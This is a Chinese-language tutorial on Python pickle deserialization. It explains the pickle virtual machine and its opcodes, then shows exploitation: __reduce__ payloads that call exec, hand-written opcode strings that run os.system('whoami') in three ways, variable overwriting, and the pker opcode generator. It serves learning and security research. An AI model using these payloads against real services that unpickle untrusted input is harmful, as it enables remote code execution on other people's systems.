Pickle序列化过程
pickle解析依靠PVM完成,PVM包含三部分:
指令处理器(解析引擎):读取opcode和参数,直到遇到`.`停止,最终留在栈顶的值将被作为反序列化对象返回
stack:由 Python 的 list 实现,被用来临时存储数据、参数以及对象
memo:由 Python 的 dict 实现,为 PVM 的整个生命周期提供存储,即将反序列化后的结果以键值对形式存储
opcode
pickle的版本不同会导致生成的opcode不同,但是pickle可以向下兼容,即v0版本的序列化内容可以被其他任意版本解析
v0版本常用opcode:
c:c[module]\n[instance]\n,获得的对象入栈,等同于import
o:寻找栈中的上一个MARK,之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象),函数的返回值(或生成的对象)入栈
(:向栈中压入一个MARK标记
S:S'xxx'\n,实例化一个字符串对象,获得的对象入栈
s:将栈顶的第二个和第一个对象作为key-value对,添加或更新到栈的第三个对象(必须为列表或字典)中,第一、二个元素出栈,第三个元素(列表或字典)添加新值或被更新
V:Vxxx\n,实例化一个UNICODE字符串对象,获得的对象入栈
i:i[module]\n[callable]\n,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行函数(或实例化一个对象),函数返回值(或生成的对象)入栈
d:寻找栈中的上一个MARK,并组合之间的数据为字典,数据必须有偶数个,即呈key-value对,MARK标记以及被组合的数据出栈,获得的对象入栈
b:使用栈顶的第一个数据(储存键值对的字典),对第二个数据(对象实例)进行属性设置,栈顶第一个数据出栈
t:寻找栈中的上一个MARK,并组合之间的数据为元组,MARK标记以及被组合的数据出栈,获得的对象入栈
R: 选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数,函数和参数出栈,函数的返回值入栈
p:pn\n,将栈顶对象储存至memo_n
pickletools
使用pickletools可以将opcode转为可视化的结构,可读性更强,例如:
import pickle
import pickletools
a = {"abc":123, "456":"DEF"}
ser = pickle.dumps(a, protocol=0)
print(b"opcode: " + ser)
pickletools.dis(ser)
运行结果:
b'opcode: (dp0\nVabc\np1\nI123\nsV456\np2\nVDEF\np3\ns.'
0: ( MARK
1: d DICT (MARK at 0)
2: p PUT 0
5: V UNICODE 'abc'
10: p PUT 1
13: I INT 123
18: s SETITEM
19: V UNICODE '456'
24: p PUT 2
27: V UNICODE 'DEF'
32: p PUT 3
35: s SETITEM
36: . STOP
highest protocol among opcodes = 0
pickle反序列化利用思路
RCE
__reduce__()魔术方法在序列化时被调用,即pickle.dumps(),返回值决定了反序列化时的行为,即pickle.loads():
def __reduce__(self) -> str | tuple[Any, ...]: ...
必须返回字符串或元组,假如返回元组可实现代码执行:
def __reduce__(self):
return (callable, (arg1, arg2, ...))
callable是要执行的函数,arg是参数,简单利用例子:
import pickle
class test(object):
def __reduce__(self):
s = "print('command1 executed');print('command2 executed')" # 要执行的命令
return (exec, (s,))
ser = pickle.dumps(test(), protocol=0)
pickle.loads(ser)
变量覆盖
import pickle
key = 1
class test(object):
def __reduce__(self):
s = "key=258"
return (exec, (s,))
ser = pickle.dumps(test(), protocol=0)
pickle.loads(ser)
print(key) # 258
手写opcode
如果过滤或禁用了exec,将无法使用__reduce__()来执行多段代码,此时就需要手写opcode
变量覆盖
secret.py:
key = "sxc"
尝试覆盖secret.py中的变量:
import pickle
import secret
opcode = """c__main__
secret
(S'key'
S'258'
db.
"""
print(secret.key) # sxc
pickle.loads(opcode.encode())
print(secret.key) # 258
RCE
可以通过R,i,o三种方式执行命令
R:
cos
system
(S'whoami'
tR.
i:
(S'whoami'
ios
system
.
o:
(cos
system
S'whoami'
o.
实例化对象
import pickle
class User:
def __init__(self, name, age):
self.name = name
self.age = age
opcode='''c__main__
User
(S'ChuanSao'
S"258"
tR.'''
user = pickle.loads(opcode.encode())
print(user.name, user.age) # ChuanSao 258
pker
Tools for converting Python source code to Pickle opcode automatically
工具地址:https://github.com/eddieivan01/pker
pker主要用到GLOBAL、INST、OBJ三种特殊的函数以及一些必要的转换方式:
GLOBAL 对应 opcode:c
GLOBAL('os', 'system') 对应 opcode:cos\nsystem\n
INST 对应 opcode:i
INST('os', 'system', 'whoami') 对应 opcode:(S'whoami'\nios\nsystem\n
OBJ 对应 opcode:o
OBJ(GLOBAL('os', 'system'), 'whoami') 对应 opcode:(cos\nsystem\nS'whoami'\no
xxx.attr='sxc' 对应opcode:(S'attr'\nS'sxc'\ndb
return 对应 opcode:.
基本用法
pker:
INST('os', 'system', 'whoami')
return
利用pker.py转换为opcode:
python pker.py < pker
b"(S'whoami'\nios\nsystem\n."
opcode表:
MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding
TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
# Protocol 2
PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long
_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]
# Protocol 3 (Python 3.x)
BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes
# Protocol 4
SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame
# Protocol 5
BYTEARRAY8 = b'\x96' # push bytearray
NEXT_BUFFER = b'\x97' # push next out-of-band buffer
READONLY_BUFFER = b'\x98' # make top of stack readonly
参考资料:
https://xz.aliyun.com/news/13498
https://xz.aliyun.com/news/7032
https://zixyd.github.io/2024/02/06/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/